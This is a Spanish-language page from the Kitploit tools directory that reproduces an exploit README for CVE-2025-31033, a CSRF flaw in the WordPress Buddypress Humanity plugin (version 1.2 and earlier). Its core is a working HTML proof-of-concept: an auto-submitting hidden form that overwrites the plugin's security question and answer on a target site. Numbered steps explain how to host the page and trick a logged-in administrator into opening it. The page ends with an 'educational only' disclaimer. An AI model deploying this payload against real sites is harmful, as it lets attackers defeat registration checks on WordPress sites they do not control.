Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-31033 — El plugin WordPress Buddypress Humanity <= 1.2 es vulnerable a Cross Site Request Forgery (CSRF). | Kitploit
Herramientas/GitHubGitHub/nxploited/cve-2025-31033
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPapers e InvestigaciónAprendizaje y Educación
GitHubnxploited/cve-2025-31033

CVE-2025-31033

El plugin WordPress Buddypress Humanity <= 1.2 es vulnerable a Cross Site Request Forgery (CSRF).

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

⚠️ CVE-2025-31033 - CSRF en el plugin Buddypress Humanity de WordPress <= 1.2

🛡️ Resumen de la vulnerabilidad

El plugin Buddypress Humanity para WordPress (versión <= 1.2) es vulnerable a Cross-Site Request Forgery (CSRF).
Esta vulnerabilidad permite a un atacante obligar a un usuario con mayores privilegios (p. ej., administrador) a modificar sin saberlo los ajustes del plugin (como la pregunta y la respuesta de seguridad), omitiendo la lógica de verificación de usuarios.


🐞 Tipo de vulnerabilidad

  • Cross Site Request Forgery (CSRF)
  • Componente afectado: página bph-settings (solo administrador)
  • CVE: CVE-2025-31033
  • Riesgo: CVSS 9.8

🚨 Impacto

Si se explota con éxito, esta vulnerabilidad permite a los atacantes:

  • Cambiar la pregunta de seguridad y la respuesta utilizadas durante el registro de usuarios
  • Omitir la verificación de humanidad al conocer la nueva respuesta
  • Automatizar el registro de usuarios (posiblemente combinado con escalada de privilegios)
  • Abusar de las protecciones del formulario de registro sin interacción del usuario

🎯 Plugin afectado

  • Nombre: Buddypress Humanity
  • Versión: ≤ 1.2
  • Slug: buddypress-humanity
  • Probado en: WordPress 6.x + BuddyPress activo

💥 Prueba de concepto (Exploit HTML)

root@kitploit:~
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>Exploit – CVE-2025-31033</title>
</head>
<body onload="document.forms[0].submit();">
  <form action="http://target.com/wp-admin/admin.php?page=bph-settings" method="POST">
    <input type="hidden" name="bph_option[bph_title]" value="Nxploited">
    <input type="hidden" name="bph_option[bph_question]" value="I’m Nxploited | Khaled Alenazi">
    <input type="hidden" name="bph_option[bph_answers]" value="Nxploit">
    <input type="hidden" name="bph_submit" value="1">
  </form>
</body>
</html>

☠️ Una vez que un administrador autenticado abre esta página, esta modifica silenciosamente los ajustes del plugin.


🔧 Cómo explotarla

  1. Aloja el HTML de la PoC en cualquier servidor externo.
  2. Engaña a un administrador de WordPress con sesión iniciada para que visite la página.
  3. Al visitarla, su navegador enviará el formulario silenciosamente.
  4. La pregunta y la respuesta de seguridad del plugin se actualizarán.
  5. El atacante ya puede registrarse utilizando la respuesta conocida.

🧪 Resultados de una explotación exitosa:

  • Pregunta modificada: I’m Nxploited | Khaled Alenazi
  • Respuesta modificada: Nxploit
  • Cualquier usuario que introduzca "Nxploit" omitirá la verificación.

⚠️ Descargo de responsabilidad

Esta prueba de concepto es solo con fines educativos.
Úsala de manera responsable y no la pruebes en sistemas que no sean tuyos.
El autor no se hace responsable de ningún mal uso o daño causado.


👤 Autor

Nxploited | Khaled Alenazi

Descargar herramienta